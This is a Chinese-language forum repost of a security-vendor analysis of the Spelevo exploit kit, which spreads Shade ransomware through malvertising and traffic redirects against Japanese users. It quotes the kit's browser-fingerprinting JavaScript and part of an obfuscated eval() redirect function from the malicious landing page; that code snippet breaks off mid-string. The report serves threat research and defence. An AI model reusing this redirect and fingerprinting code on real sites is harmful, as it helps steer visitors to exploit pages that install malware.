摘要
本文主要介绍Cybereason团队观察到的漏洞利用工具包Spelevo,并细述其漏洞利用、感染方法,以及传播Shade勒索软件的过程。
介绍
Cybereason团队注意到,今年以来针对日本的漏洞利用工具包(EK)开发活动呈增长趋势,原因可能是因为在日本老旧的操作系统相对较多。此次观察到的新工具包于今年三月初发现。
有报告称,EK开发人员的投入和回报往往不成正比,相比较他们投入的时间金钱,所获得的利润并不大。
此外,绝大多数漏洞利用工具包仅对微软的Internet Explorer有效,随着近年来谷歌Chrome和Firefox浏览器的日益普及,只剩下很少的用户在用Internet Explorer。
与Internet Explorer相比,Chrome和Firefox不仅功能上更为完善,且更能保障用户的安全,
比如后者拒绝使用Adobe Flash-AX,而Adobe Flash-AX也是此次攻击者在利用漏洞时所选择的软件。Adobe Flash-AX是默认设置的,Chrome之类的浏览器都有一个有效的补丁和更新措施,且由于大多数Chrome都是默认更新,每次漏洞发布时都会自行更新,等到EK开发人员开始利用已发布漏洞时就无用武之地了。
虽然在过去几年开发工具包的活动有所减少,但我们仍会看到有新的工具包不断出现,不管原因是什么,既然已经存在,我们还是应该做好准备,同时我们看到,攻击者也在工具包中不断融入新技术升级换代。比如今年年初,Fallout漏洞利用工具包在其库中添加了对PowerShell的使用,而在本文SpelevoEK的案例中则涉及对Windows Management Instrumentation(WMI)的使用。
Spelevo类似于RIG和GrandSoft之类的EK,很可能由俄罗斯黑客组织开发,这些工具包每月的“租金”约为1000美元至1500美元。
此次攻击攻击者将SpelevoEK和Shade捆绑在一起,能在受害者难以察觉的情况下完成诈骗,这点与Shade勒索软件的主要用途有点不一样。我们之前有研究过,欺诈点击每年都在以50%的速度在增长,是快速而又隐蔽赚钱的一种方法。
技术分析

1564386807892255.png

1564386807892255.png

图1.Spelevo漏洞利用工具包的感染流程
Spelevo的感染机制与Fallout相似:用户浏览网页时如果访问了受感染的网站,就会被悄悄重定向到漏洞利用工具包的登录页面。过去大多数受感染的网站都是成人网站,但这次却是一个合法的电视服务网站。

1564386830138634.png

1564386830138634.png

图2.感染模式
漏洞利用工具包通常由流量分配系统(TDS)传播,TDS是负责流量分配的中介,能控制大量的流量,并收集攻击者可以利用的统计数据以改进攻击。攻击者可以根据地理位置、浏览器类型等控制重定向目标,以及选择攻击受害者的恶意软件类型。
Fallout和Spelevo通过HookAds恶意广告传播,基础设施也是相同的。在撰写本文时活动仍在运行,每天都会注册新域名。在我们的分析过程中,一些域已经被新的替换。

1564386841589980.png

1564386841589980.png

图3.Spelevo的域名
快速轮换是存活下来的原因。重定向的代码(取自todaymale[.]xyz)包括一些浏览器检查和负责进一步重定向的代码。
HOOKADS 重定向和SPELEVO登陆页面
浏览器检查:
functiongetBrowser(){[REDACTED]try{varbName=function(){if(ua.search(/Edge/)>-1)return"edge";if((ua.search(/MSIE/)>-1)||(ua.search(/Trident/)>-1))return"ie";if(ua.search(/Firefox/)>-1)return"firefox";if((ua.search(/Opera/)>-1)||(ua.search(/OPR/)>-1))return"opera";if(ua.search(/YaBrowser/)>-1)return"yabrowser";if(ua.search(/Chrome/)>-1)return"chrome";if(ua.search(/Safari/)>-1)return"safari";if(ua.search(/Maxthon/)>-1)return"maxthon";elsereturn"unknown";}();
恶意eval重定向功能:
eval(function(a,b,c,d,e,f){e=function(a){return(a35?String.fromCharCode(a+29):a.toString(36));};if(!"".replace(/^/,String)){while(c--)f[e(c)]=d[c]||e(c);d=[function(a){returnf[a];}];e=function(){return"\\w+";};c=1;}while(c--)if(d[c])a=a.replace(newRegExp("\\b"+e(c)+"\\b","g"),d[c]);returna;}('8c="z"+"B"+"E"+"C+/"+"=";qu(1){85="";8d,h,k="";8l,a,7,b="";8i=0;8v=/[^A-w-x-9\\+\\/\\=]/g;e(v.D(1)){}1=1.G(/[^A-w-x-9\\+\\/\\=]/g,"");F{l=c.f(1.j(i++));a=c.f(1.j(i++));7=c.f(1.j(i++));b=c.f(1.j(i++));d=(l>4);h=((a&H)>2);k=((7&3)\';s.r[0].n.Q[0].N()}}',62,64,"|input
回复

使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Powered by shiliapp.com   © 2019-2020